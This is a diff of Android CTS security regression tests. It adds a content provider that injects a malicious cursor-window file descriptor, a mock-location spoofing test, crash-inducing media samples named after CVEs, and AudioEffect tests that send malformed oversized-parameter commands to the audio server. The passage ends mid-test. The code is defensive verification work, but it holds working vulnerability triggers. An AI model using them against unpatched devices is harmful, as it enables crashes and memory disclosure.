diff --git a/tests/tests/content/src/android/content/cts/ContentProviderCursorWindowTest.java b/tests/tests/content/src/android/content/cts/ContentProviderCursorWindowTest.java
new file mode 100644
index 0000000..004b193
--- /dev/null
+++ b/tests/tests/content/src/android/content/cts/ContentProviderCursorWindowTest.java
@@ -0,0 +1,54 @@
+/*
+ * Copyright (C) 2017 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License
+ */
+
+package android.content.cts;
+
+import android.database.Cursor;
+import android.database.sqlite.SQLiteException;
+import android.net.Uri;
+import android.test.AndroidTestCase;
+import android.util.Log;
+
+import java.io.IOException;
+
+/**
+ * Test {@link CursorWindowContentProvider} .
+ */
+public class ContentProviderCursorWindowTest extends AndroidTestCase {
+ private static final String TAG = "ContentProviderCursorWindowTest";
+
+ public void testQuery() throws IOException {
+ Cursor cursor = getContext().getContentResolver().query(
+ Uri.parse("content://cursorwindow.provider/hello"),
+ null, null, null, null
+ );
+ try {
+ cursor.moveToFirst();
+
+ int type = cursor.getType(0);
+ if (type != Cursor.FIELD_TYPE_BLOB) {
+ fail("Unexpected type " + type);
+ }
+ byte[] blob = cursor.getBlob(0);
+ Log.i(TAG, "Blob length " + blob.length);
+ fail("getBlob should fail due to invalid offset used in the field slot");
+ } catch (SQLiteException expected) {
+ Log.i(TAG, "Expected exception: " + expected);
+ } finally {
+ cursor.close();
+ }
+ }
+}
diff --git a/tests/tests/content/src/android/content/cts/CursorWindowContentProvider.java b/tests/tests/content/src/android/content/cts/CursorWindowContentProvider.java
new file mode 100644
index 0000000..4266f35
--- /dev/null
+++ b/tests/tests/content/src/android/content/cts/CursorWindowContentProvider.java
@@ -0,0 +1,130 @@
+/*
+ * Copyright (C) 2017 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License
+ */
+
+package android.content.cts;
+
+import android.annotation.NonNull;
+import android.annotation.Nullable;
+import android.content.ContentProvider;
+import android.content.ContentValues;
+import android.database.AbstractWindowedCursor;
+import android.database.Cursor;
+import android.database.CursorWindow;
+import android.net.Uri;
+import android.os.Parcel;
+import android.os.ParcelFileDescriptor;
+import android.util.Log;
+
+/**
+ * Content provider that uses a custom {@link CursorWindow} to inject file descriptor
+ * pointing to another ashmem region having window slots with references outside of allowed ranges.
+ *
+ * <p>Used in {@link ContentProviderCursorWindowTest}
+ */
+public class CursorWindowContentProvider extends ContentProvider {
+ private static final String TAG = "CursorWindowContentProvider";
+ static {
+ System.loadLibrary("nativecursorwindow_jni");
+ }
+
+ @Override
+ public Cursor query(Uri uri, String[] projection, String selection,
+ String[] selectionArgs, String sortOrder) {
+ AbstractWindowedCursor cursor = new AbstractWindowedCursor() {
+ @Override
+ public int getCount() {
+ return 1;
+ }
+
+ @Override
+ public String[] getColumnNames() {
+ return new String[] {"a"};
+ }
+ };
+ cursor.setWindow(new InjectingCursorWindow("TmpWindow"));
+ return cursor;
+ }
+
+ class InjectingCursorWindow extends CursorWindow {
+ InjectingCursorWindow(String name) {
+ super(name);
+ }
+
+ @Override
+ public void writeToParcel(Parcel dest, int flags) {
+ Parcel tmp = Parcel.obtain();
+
+ super.writeToParcel(tmp, flags);
+ tmp.setDataPosition(0);
+ // Find location of file descriptor
+ int fdPos = -1;
+ while (tmp.dataAvail() > 0) {
+ fdPos = tmp.dataPosition();
+ int frameworkFdMarker = tmp.readInt();
+ if (frameworkFdMarker == 0x66642a85 /* BINDER_TYPE_FD */) {
+ break;
+ }
+ }
+ if (fdPos == -1) {
+ tmp.recycle();
+ throw new IllegalStateException("File descriptor not found in the output of "
+ + "CursorWindow.writeToParcel");
+ }
+ // Write reply with replaced file descriptor
+ ParcelFileDescriptor evilFd = ParcelFileDescriptor
+ .adoptFd(makeNativeCursorWindowFd(1000, 1000, true));
+ dest.appendFrom(tmp, 0, fdPos);
+ dest.writeFileDescriptor(evilFd.getFileDescriptor());
+ tmp.setDataPosition(dest.dataPosition());
+ dest.appendFrom(tmp, dest.dataPosition(), tmp.dataAvail());
+ tmp.recycle();
+ }
+ }
+
+ private native static int makeNativeCursorWindowFd(int offset, int size, boolean isBlob);
+
+ // Stubs
+ @Override
+ public boolean onCreate() {
+ return true;
+ }
+
+ @Override
+ public int delete(Uri uri, String selection, String[] selectionArgs) {
+ Log.e(TAG, "delete() not implemented");
+ return 0;
+ }
+
+ @Override
+ public String getType(Uri uri) {
+ Log.e(TAG, "getType() not implemented");
+ return "";
+ }
+
+ @Override
+ public Uri insert(@NonNull Uri uri, @Nullable ContentValues values) {
+ Log.e(TAG, "insert() not implemented");
+ return null;
+ }
+
+ @Override
+ public int update(Uri uri, ContentValues values, String selection,
+ String[] selectionArgs) {
+ Log.e(TAG, "update() not implemented");
+ return 0;
+ }
+
+}
diff --git a/tests/tests/location/src/android/location/cts/LocationManagerTest.java b/tests/tests/location/src/android/location/cts/LocationManagerTest.java
index 7fcc2aa..3af213e 100644
--- a/tests/tests/location/src/android/location/cts/LocationManagerTest.java
+++ b/tests/tests/location/src/android/location/cts/LocationManagerTest.java
@@ -993,6 +993,27 @@
}
}
+ /**
+ * Test case for bug 33091107, where a malicious app used to be able to fool a real provider
+ * into providing a mock location that isn't marked as being mock.
+ */
+ public void testLocationShouldStillBeMarkedMockWhenProvidersDoNotMatch()
+ throws InterruptedException {
+ double latitude = 20;
+ double longitude = 40;
+
+ List<String> providers = mManager.getAllProviders();
+ if (providers.isEmpty()) {
+ // Device doesn't have any providers. Can't perform this test, and no need to do so:
+ // no providers that malicious app could fool
+ return;
+ }
+ String realProviderToFool = providers.get(0);
+
+ // Register for location updates, then set a mock location and ensure it is marked "mock"
+ updateLocationAndWait(TEST_MOCK_PROVIDER_NAME, realProviderToFool, latitude, longitude);
+ }
+
@UiThreadTest
public void testGpsStatusListener() {
MockGpsStatusListener listener = new MockGpsStatusListener();
@@ -1152,22 +1173,38 @@
private void updateLocationAndWait(String providerName, double latitude, double longitude)
throws InterruptedException {
+ updateLocationAndWait(providerName, providerName, latitude, longitude);
+ }
+
+ /**
+ * Like {@link #updateLocationAndWait(String, double, double)}, but allows inconsistent providers
+ * to be used in the calls to {@link Location#Location(String)} and {@link
+ * LocationManager#setTestProviderLocation(String, Location)}
+ *
+ * @param testProviderName used in {@link LocationManager#setTestProviderLocation(String,
+ * Location)}
+ * @param locationProviderName used in {@link Location#Location(String)}
+ */
+ private void updateLocationAndWait(String testProviderName, String locationProviderName,
+ double latitude, double longitude) throws InterruptedException {
+
// Register a listener for the location we are about to set.
MockLocationListener listener = new MockLocationListener();
HandlerThread handlerThread = new HandlerThread("updateLocationAndWait");
handlerThread.start();
- mManager.requestLocationUpdates(providerName, 0, 0, listener, handlerThread.getLooper());
+ mManager.requestLocationUpdates(locationProviderName, 0, 0, listener,
+ handlerThread.getLooper());
// Set the location.
- updateLocation(providerName, latitude, longitude);
+ updateLocation(testProviderName, locationProviderName, latitude, longitude);
// Make sure we received the location, and it is the right one.
- assertTrue(listener.hasCalledOnLocationChanged(TEST_TIME_OUT));
+ assertTrue("Listener not called", listener.hasCalledOnLocationChanged(TEST_TIME_OUT));
Location location = listener.getLocation();
- assertEquals(providerName, location.getProvider());
- assertEquals(latitude, location.getLatitude());
- assertEquals(longitude, location.getLongitude());
- assertEquals(true, location.isFromMockProvider());
+ assertEquals("Bad provider name", locationProviderName, location.getProvider());
+ assertEquals("Bad latitude", latitude, location.getLatitude());
+ assertEquals("Bad longitude", longitude, location.getLongitude());
+ assertTrue("Bad isMock", location.isFromMockProvider());
// Remove the listener.
mManager.removeUpdates(listener);
@@ -1220,13 +1257,23 @@
private void updateLocation(final String providerName, final double latitude,
final double longitude) {
- Location location = new Location(providerName);
+ updateLocation(providerName, providerName, latitude, longitude);
+ }
+
+ /**
+ * Like {@link #updateLocation(String, double, double)}, but allows inconsistent providers to be
+ * used in the calls to {@link Location#Location(String)} and
+ * {@link LocationManager#setTestProviderLocation(String, Location)}.
+ */
+ private void updateLocation(String testProviderName, String locationProviderName,
+ double latitude, double longitude) {
+ Location location = new Location(locationProviderName);
location.setLatitude(latitude);
location.setLongitude(longitude);
location.setAccuracy(1.0f);
- location.setTime(java.lang.System.currentTimeMillis());
+ location.setTime(System.currentTimeMillis());
location.setElapsedRealtimeNanos(SystemClock.elapsedRealtimeNanos());
- mManager.setTestProviderLocation(providerName, location);
+ mManager.setTestProviderLocation(testProviderName, location);
}
private void updateLocation(final double latitude, final double longitude) {
diff --git a/tests/tests/media/src/android/media/cts/DecodeAccuracyTest.java b/tests/tests/media/src/android/media/cts/DecodeAccuracyTest.java
index e7b8adf..7b74ba7 100644
--- a/tests/tests/media/src/android/media/cts/DecodeAccuracyTest.java
+++ b/tests/tests/media/src/android/media/cts/DecodeAccuracyTest.java
@@ -19,10 +19,7 @@
import android.annotation.TargetApi;
import android.content.Context;
-import android.cts.util.MediaUtils;
import android.graphics.Bitmap;
-import android.media.MediaFormat;
-import android.support.test.runner.AndroidJUnit4;
import android.util.Log;
import android.view.View;
@@ -139,23 +136,17 @@
private void runH264DecodeAccuracyTest(
VideoViewFactory videoViewFactory, VideoFormat videoFormat) {
- if (MediaUtils.checkDecoder(MediaFormat.MIMETYPE_VIDEO_AVC)) {
- runDecodeAccuracyTest(videoViewFactory, videoFormat, R.raw.h264decodertestgolden);
- }
+ runDecodeAccuracyTest(videoViewFactory, videoFormat, R.raw.h264decodertestgolden);
}
private void runVP9DecodeAccuracyTest(
VideoViewFactory videoViewFactory, VideoFormat videoFormat) {
- if (MediaUtils.checkDecoder(MediaFormat.MIMETYPE_VIDEO_VP9)) {
- runDecodeAccuracyTest(videoViewFactory, videoFormat, R.raw.vp9decodertestgolden);
- }
+ runDecodeAccuracyTest(videoViewFactory, videoFormat, R.raw.vp9decodertestgolden);
}
private void runH264DecodeCroppedTest(
VideoViewFactory videoViewFactory, VideoFormat videoFormat) {
- if (MediaUtils.checkDecoder(MediaFormat.MIMETYPE_VIDEO_AVC)) {
- runDecodeAccuracyTest(videoViewFactory, videoFormat, R.raw.h264decodertest520x360golden);
- }
+ runDecodeAccuracyTest(videoViewFactory, videoFormat, R.raw.h264decodertest520x360golden);
}
private void runDecodeAccuracyTest(
diff --git a/tests/tests/media/src/android/media/cts/MediaRecorderTest.java b/tests/tests/media/src/android/media/cts/MediaRecorderTest.java
index 3cbfdbf..2d38933 100644
--- a/tests/tests/media/src/android/media/cts/MediaRecorderTest.java
+++ b/tests/tests/media/src/android/media/cts/MediaRecorderTest.java
@@ -424,6 +424,18 @@
return 1;
}
+ public void testRecordAudioFromAudioSourceUnprocessed() throws Exception {
+ if (!hasMicrophone() || !hasAmrNb()) {
+ MediaUtils.skipTest("no audio codecs or microphone");
+ return;
+ }
+ mMediaRecorder.setAudioSource(MediaRecorder.AudioSource.UNPROCESSED);
+ mMediaRecorder.setOutputFormat(MediaRecorder.OutputFormat.DEFAULT);
+ mMediaRecorder.setOutputFile(OUTPUT_PATH);
+ mMediaRecorder.setAudioEncoder(MediaRecorder.AudioEncoder.DEFAULT);
+ recordMedia(MAX_FILE_SIZE, mOutFile);
+ }
+
public void testGetAudioSourceMax() throws Exception {
final int max = MediaRecorder.getAudioSourceMax();
assertTrue(MediaRecorder.AudioSource.DEFAULT <= max);
diff --git a/tests/tests/os/src/android/os/cts/SecurityPatchTest.java b/tests/tests/os/src/android/os/cts/SecurityPatchTest.java
index 4531aa6..c5baeed 100644
--- a/tests/tests/os/src/android/os/cts/SecurityPatchTest.java
+++ b/tests/tests/os/src/android/os/cts/SecurityPatchTest.java
@@ -31,8 +31,8 @@
"ro.build.version.security_patch should be in the format \"YYYY-MM-DD\". Found \"%s\"";
private static final String SECURITY_PATCH_DATE_ERROR =
"ro.build.version.security_patch should be \"%d-%02d\" or later. Found \"%s\"";
- private static final int SECURITY_PATCH_YEAR = 2016;
- private static final int SECURITY_PATCH_MONTH = 12;
+ private static final int SECURITY_PATCH_YEAR = 2017;
+ private static final int SECURITY_PATCH_MONTH = 05;
private boolean mSkipTests = false;
diff --git a/tests/tests/security/AndroidManifest.xml b/tests/tests/security/AndroidManifest.xml
index 7468d68..7b87851 100644
--- a/tests/tests/security/AndroidManifest.xml
+++ b/tests/tests/security/AndroidManifest.xml
@@ -25,6 +25,7 @@
<uses-permission android:name="android.permission.ACCESS_WIFI_STATE" />
<uses-permission android:name="android.permission.MODIFY_AUDIO_SETTINGS" />
<uses-permission android:name="android.permission.WRITE_EXTERNAL_STORAGE" />
+ <uses-permission android:name="android.permission.RECORD_AUDIO" />
<application>
<uses-library android:name="android.test.runner" />
diff --git a/tests/tests/security/res/raw/bug_31647370.ogg b/tests/tests/security/res/raw/bug_31647370.ogg
new file mode 100644
index 0000000..31f602a
--- /dev/null
+++ b/tests/tests/security/res/raw/bug_31647370.ogg
Binary files differ
diff --git a/tests/tests/security/res/raw/bug_32322258.mp4 b/tests/tests/security/res/raw/bug_32322258.mp4
new file mode 100644
index 0000000..6fcab5e
--- /dev/null
+++ b/tests/tests/security/res/raw/bug_32322258.mp4
Binary files differ
diff --git a/tests/tests/security/res/raw/bug_32577290.mp3 b/tests/tests/security/res/raw/bug_32577290.mp3
new file mode 100644
index 0000000..1098bb0
--- /dev/null
+++ b/tests/tests/security/res/raw/bug_32577290.mp3
Binary files differ
diff --git a/tests/tests/security/res/raw/bug_32873375.mp4 b/tests/tests/security/res/raw/bug_32873375.mp4
new file mode 100644
index 0000000..71e9c7b
--- /dev/null
+++ b/tests/tests/security/res/raw/bug_32873375.mp4
Binary files differ
diff --git a/tests/tests/security/res/raw/bug_32915871.mp4 b/tests/tests/security/res/raw/bug_32915871.mp4
new file mode 100644
index 0000000..9e50aaa
--- /dev/null
+++ b/tests/tests/security/res/raw/bug_32915871.mp4
Binary files differ
diff --git a/tests/tests/security/res/raw/bug_33137046.mp4 b/tests/tests/security/res/raw/bug_33137046.mp4
new file mode 100644
index 0000000..01f49b2
--- /dev/null
+++ b/tests/tests/security/res/raw/bug_33137046.mp4
Binary files differ
diff --git a/tests/tests/security/res/raw/bug_33251605.bmp b/tests/tests/security/res/raw/bug_33251605.bmp
new file mode 100644
index 0000000..0060ff4
--- /dev/null
+++ b/tests/tests/security/res/raw/bug_33251605.bmp
Binary files differ
diff --git a/tests/tests/security/res/raw/bug_33300701.tiff b/tests/tests/security/res/raw/bug_33300701.tiff
new file mode 100644
index 0000000..ea7a477
--- /dev/null
+++ b/tests/tests/security/res/raw/bug_33300701.tiff
Binary files differ
diff --git a/tests/tests/security/res/raw/bug_33818508.mp4 b/tests/tests/security/res/raw/bug_33818508.mp4
new file mode 100644
index 0000000..d2f2604
--- /dev/null
+++ b/tests/tests/security/res/raw/bug_33818508.mp4
Binary files differ
diff --git a/tests/tests/security/res/raw/bug_33897722.gif b/tests/tests/security/res/raw/bug_33897722.gif
new file mode 100755
index 0000000..7a563d7
--- /dev/null
+++ b/tests/tests/security/res/raw/bug_33897722.gif
Binary files differ
diff --git a/tests/tests/security/res/raw/bug_35467107.mp4 b/tests/tests/security/res/raw/bug_35467107.mp4
new file mode 100644
index 0000000..43ccef6
--- /dev/null
+++ b/tests/tests/security/res/raw/bug_35467107.mp4
Binary files differ
diff --git a/tests/tests/security/res/raw/bug_35763994.amr b/tests/tests/security/res/raw/bug_35763994.amr
new file mode 100644
index 0000000..b6d3f0e
--- /dev/null
+++ b/tests/tests/security/res/raw/bug_35763994.amr
@@ -0,0 +1 @@
+#!AMR-WB
diff --git a/tests/tests/security/res/raw/cve_2015_6608_b_23680780.mp4 b/tests/tests/security/res/raw/cve_2015_6608_b_23680780.mp4
new file mode 100644
index 0000000..6d41ebc
--- /dev/null
+++ b/tests/tests/security/res/raw/cve_2015_6608_b_23680780.mp4
Binary files differ
diff --git a/tests/tests/security/res/raw/cve_2016_2429_b_27211885.mp3 b/tests/tests/security/res/raw/cve_2016_2429_b_27211885.mp3
new file mode 100644
index 0000000..0232e70
--- /dev/null
+++ b/tests/tests/security/res/raw/cve_2016_2429_b_27211885.mp3
Binary files differ
diff --git a/tests/tests/security/res/raw/cve_2016_2507.mp4 b/tests/tests/security/res/raw/cve_2016_2507.mp4
new file mode 100644
index 0000000..ca248e1
--- /dev/null
+++ b/tests/tests/security/res/raw/cve_2016_2507.mp4
Binary files differ
diff --git a/tests/tests/security/res/raw/onekhzsine_90sec.mp3 b/tests/tests/security/res/raw/onekhzsine_90sec.mp3
new file mode 100644
index 0000000..3049011
--- /dev/null
+++ b/tests/tests/security/res/raw/onekhzsine_90sec.mp3
Binary files differ
diff --git a/tests/tests/security/src/android/security/cts/AudioSecurityTest.java b/tests/tests/security/src/android/security/cts/AudioSecurityTest.java
new file mode 100644
index 0000000..0d453da
--- /dev/null
+++ b/tests/tests/security/src/android/security/cts/AudioSecurityTest.java
@@ -0,0 +1,409 @@
+/*
+ * Copyright (C) 2016 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+package android.security.cts;
+
+import android.cts.util.CtsAndroidTestCase;
+import android.media.AudioFormat;
+import android.media.AudioManager;
+import android.media.AudioTrack;
+import android.media.audiofx.AudioEffect;
+import android.util.Log;
+
+import java.nio.ByteBuffer;
+import java.nio.ByteOrder;
+import java.util.Arrays;
+import java.util.UUID;
+
+public class AudioSecurityTest extends CtsAndroidTestCase {
+ private static final String TAG = "AudioSecurityTest";
+
+ private static final int ERROR_DEAD_OBJECT = -7; // AudioEffect.ERROR_DEAD_OBJECT
+
+ // should match audio_effect.h (native)
+ private static final int EFFECT_CMD_SET_PARAM = 5;
+ private static final int EFFECT_CMD_GET_PARAM = 8;
+ private static final int EFFECT_CMD_OFFLOAD = 20;
+ private static final int SIZEOF_EFFECT_PARAM_T = 12;
+
+ private static void verifyZeroReply(byte[] reply) throws Exception {
+ int count = 0;
+ for (byte b : reply) {
+ if (b != 0) {
+ count++;
+ }
+ }
+ assertEquals("reply has " + count + " nonzero values", 0 /* expected */, count);
+ }
+
+ // @FunctionalInterface
+ private interface TestEffect {
+ void test(AudioEffect audioEffect) throws Exception;
+ }
+
+ private static void testAllEffects(String testName, TestEffect testEffect) throws Exception {
+ int failures = 0;
+ for (AudioEffect.Descriptor descriptor : AudioEffect.queryEffects()) {
+ final AudioEffect audioEffect;
+ try {
+ audioEffect = (AudioEffect)AudioEffect.class.getConstructor(
+ UUID.class, UUID.class, int.class, int.class).newInstance(
+ descriptor.type,
+ descriptor.uuid, // uuid overrides type
+ 0 /* priority */, 0 /* audioSession */);
+ } catch (Exception e) {
+ Log.w(TAG, "effect " + testName + " " + descriptor.name
+ + " cannot be created (ignoring)");
+ continue; // OK;
+ }
+ try {
+ testEffect.test(audioEffect);
+ Log.d(TAG, "effect " + testName + " " + descriptor.name + " success");
+ } catch (Exception e) {
+ Log.e(TAG, "effect " + testName + " " + descriptor.name + " failed!");
+ ++failures;
+ } catch (AssertionError e) {
+ Log.e(TAG, "effect " + testName + " " + descriptor.name + " failed!");
+ ++failures;
+ }
+ }
+ assertEquals("found " + testName + " " + failures + " failures",
+ 0 /* expected */, failures);
+ }
+
+ // b/28173666
+ public void testAllEffectsGetParameterAttemptOffload_CVE_2016_3745() throws Exception {
+ testAllEffects("get parameter attempt offload",
+ new TestEffect() {
+ @Override
+ public void test(AudioEffect audioEffect) throws Exception {
+ testAudioEffectGetParameter(audioEffect, true /* offload */);
+ }
+ });
+ }
+
+ // b/32438594
+ // b/32624850
+ // b/32635664
+ public void testAllEffectsGetParameter2AttemptOffload_CVE_2017_0398() throws Exception {
+ testAllEffects("get parameter2 attempt offload",
+ new TestEffect() {
+ @Override
+ public void test(AudioEffect audioEffect) throws Exception {
+ testAudioEffectGetParameter2(audioEffect, true /* offload */);
+ }
+ });
+ }
+
+ // b/30204301
+ public void testAllEffectsSetParameterAttemptOffload_CVE_2016_3924() throws Exception {
+ testAllEffects("set parameter attempt offload",
+ new TestEffect() {
+ @Override
+ public void test(AudioEffect audioEffect) throws Exception {
+ testAudioEffectSetParameter(audioEffect, true /* offload */);
+ }
+ });
+ }
+
+ private static void testAudioEffectGetParameter(
+ AudioEffect audioEffect, boolean offload) throws Exception {
+ if (audioEffect == null) {
+ return;
+ }
+ try {
+ // 1) set offload_enabled
+ if (offload) {
+ byte command[] = new byte[8];
+ Arrays.fill(command, (byte)1);
+ byte reply[] = new byte[4]; // ignored
+
+ /* ignored */ AudioEffect.class.getDeclaredMethod(
+ "command", int.class, byte[].class, byte[].class).invoke(
+ audioEffect, EFFECT_CMD_OFFLOAD, command, reply);
+ }
+
+ // 2) get parameter with invalid psize
+ {
+ byte command[] = new byte[30];
+ Arrays.fill(command, (byte)0xDD);
+ byte reply[] = new byte[30];
+
+ Integer ret = (Integer) AudioEffect.class.getDeclaredMethod(
+ "command", int.class, byte[].class, byte[].class).invoke(
+ audioEffect, EFFECT_CMD_GET_PARAM, command, reply);
+
+ assertTrue("Audio server might have crashed", ret != ERROR_DEAD_OBJECT);
+ verifyZeroReply(reply);
+ }
+
+ // NOTE: an alternative way of checking crash:
+ //
+ // Thread.sleep(1000 /* millis */);
+ // assertTrue("Audio server might have crashed",
+ // audioEffect.setEnabled(false) != AudioEffect.ERROR_DEAD_OBJECT);
+ } catch (NoSuchMethodException e) {
+ Log.w(TAG, "AudioEffect.command() does not exist (ignoring)"); // OK
+ } finally {
+ audioEffect.release();
+ }
+ }
+
+ private static void testAudioEffectGetParameter2(
+ AudioEffect audioEffect, boolean offload) throws Exception {
+ if (audioEffect == null) {
+ return;
+ }
+ try {
+ // 1) set offload_enabled
+ if (offload) {
+ byte command[] = new byte[8];
+ Arrays.fill(command, (byte)1);
+ byte reply[] = new byte[4]; // ignored
+
+ /* ignored */ AudioEffect.class.getDeclaredMethod(
+ "command", int.class, byte[].class, byte[].class).invoke(
+ audioEffect, EFFECT_CMD_OFFLOAD, command, reply);
+ }
+
+ // 2) get parameter with small command size but large psize
+ {
+ final int parameterSize = 0x100000;
+
+ byte command[] = ByteBuffer.allocate(5 * 4 /* capacity */)
+ .order(ByteOrder.nativeOrder())
+ .putInt(0) // status (unused)
+ .putInt(parameterSize) // psize (very large)
+ .putInt(0) // vsize
+ .putInt(0x04030201) // data[0] (param too small for psize)
+ .putInt(0x08070605) // data[4]
+ .array();
+ byte reply[] = new byte[parameterSize + SIZEOF_EFFECT_PARAM_T];
+
+ Integer ret = (Integer) AudioEffect.class.getDeclaredMethod(
+ "command", int.class, byte[].class, byte[].class).invoke(
+ audioEffect, EFFECT_CMD_GET_PARAM, command, reply);
+
+ verifyZeroReply(reply);
+ assertTrue("Audio server might have crashed", ret != ERROR_DEAD_OBJECT);
+ }
+ } catch (NoSuchMethodException e) {
+ Log.w(TAG, "AudioEffect.command() does not exist (ignoring)"); // OK
+ } finally {
+ audioEffect.release();
+ }
+ }
+
+ private static void testAudioEffectGetParameter3(AudioEffect audioEffect) throws Exception {
+ if (audioEffect == null) {
+ return;
+ }
+ try {
+ // 1) get parameter with zero command size
+ {
+ final int parameterSize = 0x10;
+
+ Integer ret = (Integer) AudioEffect.class.getDeclaredMethod(
+ "command", int.class, byte[].class, byte[].class).invoke(
+ audioEffect,
+ EFFECT_CMD_GET_PARAM,
+ new byte[0] /* command */,
+ new byte[parameterSize + SIZEOF_EFFECT_PARAM_T] /* reply */);
+
+ assertTrue("Audio server might have crashed", ret != ERROR_DEAD_OBJECT);
+ }
+ } catch (NoSuchMethodException e) {
+ Log.w(TAG, "AudioEffect.command() does not exist (ignoring)"); // OK
+ } finally {
+ audioEffect.release();
+ }
+ }
+
+ private static void testAudioEffectSetParameter(
+ AudioEffect audioEffect, boolean offload) throws Exception {
+ if (audioEffect == null) {
+ return;
+ }
+ try {
+ // 1) set offload_enabled
+ if (offload) {
+ byte command[] = new byte[8];
+ Arrays.fill(command, (byte)1);
+ byte reply[] = new byte[4]; // ignored
+
+ /* ignored */ AudioEffect.class.getDeclaredMethod(
+ "command", int.class, byte[].class, byte[].class).invoke(
+ audioEffect, EFFECT_CMD_OFFLOAD, command, reply);
+ }
+
+ // 2) set parameter with invalid psize
+ {
+ byte command[] = ByteBuffer.allocate(5 * 4 /* capacity */)
+ .order(ByteOrder.nativeOrder())
+ .putInt(0) // status (unused)
+ .putInt(0xdddddddd) // psize (very large)
+ .putInt(4) // vsize
+ .putInt(1) // data[0] (param too small for psize)
+ .putInt(0) // data[4]
+ .array();
+ byte reply[] = new byte[4]; // returns status code (ignored)
+
+ Integer ret = (Integer) AudioEffect.class.getDeclaredMethod(
+ "command", int.class, byte[].class, byte[].class).invoke(
+ audioEffect, EFFECT_CMD_SET_PARAM, command, reply);
+
+ assertTrue("Audio server might have crashed", ret != ERROR_DEAD_OBJECT);
+ // on failure reply may contain the status code.
+ }
+ } catch (NoSuchMethodException e) {
+ Log.w(TAG, "AudioEffect.command() does not exist (ignoring)"); // OK
+ } finally {
+ audioEffect.release();
+ }
+ }
+
+ private static void testAudioEffectSetOffload(AudioEffect audioEffect) throws Exception {
+ if (audioEffect == null) {
+ return;
+ }
+ try {
+ // 1) set offload_enabled with zero command and reply size
+ {
+ Integer ret = (Integer) AudioEffect.class.getDeclaredMethod(
+ "command", int.class, byte[].class, byte[].class).invoke(
+ audioEffect,
+ EFFECT_CMD_OFFLOAD,
+ new byte[0] /* command */,
+ new byte[0] /* reply */);
+
+ assertTrue("Audio server might have crashed", ret != ERROR_DEAD_OBJECT);
+ }
+ } catch (NoSuchMethodException e) {
+ Log.w(TAG, "AudioEffect.command() does not exist (ignoring)"); // OK
+ } finally {
+ audioEffect.release();
+ }
+ }
+
+ // should match effect_visualizer.h (native)
+ private static final String VISUALIZER_TYPE = "e46b26a0-dddd-11db-8afd-0002a5d5c51b";
+ private static final int VISUALIZER_CMD_CAPTURE = 0x10000;
+ private static final int VISUALIZER_PARAM_CAPTURE_SIZE = 0;
+
+ // b/31781965
+ public void testVisualizerCapture_CVE_2017_0396() throws Exception {
+ // Capture params
+ final int CAPTURE_SIZE = 1 << 24; // 16MB seems to be large enough to cause a SEGV.
+ final byte[] captureBuf = new byte[CAPTURE_SIZE];
+
+ // Track params
+ final int sampleRate = 48000;
+ final int format = AudioFormat.ENCODING_PCM_16BIT;
+ final int loops = 1;
+ final int seconds = 1;
+ final int channelCount = 2;
+ final int bufferFrames = seconds * sampleRate;
+ final int bufferSamples = bufferFrames * channelCount;
+ final int bufferSize = bufferSamples * 2; // bytes per sample for 16 bits
+ final short data[] = new short[bufferSamples]; // zero data
+
+ for (AudioEffect.Descriptor descriptor : AudioEffect.queryEffects()) {
+ if (descriptor.type.compareTo(UUID.fromString(VISUALIZER_TYPE)) != 0) {
+ continue;
+ }
+
+ AudioEffect audioEffect = null;
+ AudioTrack audioTrack = null;
+
+ try {
+ // create track and play
+ {
+ audioTrack = new AudioTrack(AudioManager.STREAM_MUSIC, sampleRate,
+ AudioFormat.CHANNEL_OUT_STEREO, format, bufferSize,
+ AudioTrack.MODE_STATIC);
+ assertEquals("Cannot write to audio track",
+ bufferSamples,
+ audioTrack.write(data, 0 /* offsetInBytes */, data.length));
+ assertEquals("AudioTrack not initialized",
+ AudioTrack.STATE_INITIALIZED,
+ audioTrack.getState());
+ assertEquals("Cannot set loop points",
+ android.media.AudioTrack.SUCCESS,
+ audioTrack.setLoopPoints(0 /* startInFrames */, bufferFrames, loops));
+ audioTrack.play();
+ }
+
+ // wait for track to really begin playing
+ Thread.sleep(200 /* millis */);
+
+ // create effect
+ {
+ audioEffect = (AudioEffect) AudioEffect.class.getConstructor(
+ UUID.class, UUID.class, int.class, int.class).newInstance(
+ descriptor.type, descriptor.uuid, 0 /* priority */,
+ audioTrack.getAudioSessionId());
+ }
+
+ // set capture size
+ {
+ byte command[] = ByteBuffer.allocate(5 * 4 /* capacity */)
+ .order(ByteOrder.nativeOrder())
+ .putInt(0) // status (unused)
+ .putInt(4) // psize (sizeof(param))
+ .putInt(4) // vsize (sizeof(value))
+ .putInt(VISUALIZER_PARAM_CAPTURE_SIZE) // data[0] (param)
+ .putInt(CAPTURE_SIZE) // data[4] (value)
+ .array();
+
+ Integer ret = (Integer) AudioEffect.class.getDeclaredMethod(
+ "command", int.class, byte[].class, byte[].class).invoke(
+ audioEffect,
+ EFFECT_CMD_SET_PARAM,
+ command, new byte[4] /* reply */);
+ Log.d(TAG, "setparam returns " + ret);
+ assertTrue("Audio server might have crashed", ret != ERROR_DEAD_OBJECT);
+ }
+
+ // enable effect
+ {
+ final int ret = audioEffect.setEnabled(true);
+ assertEquals("Cannot enable audio effect", 0 /* expected */, ret);
+ }
+
+ // wait for track audio data to be processed, otherwise capture
+ // will not really return audio data.
+ Thread.sleep(200 /* millis */);
+
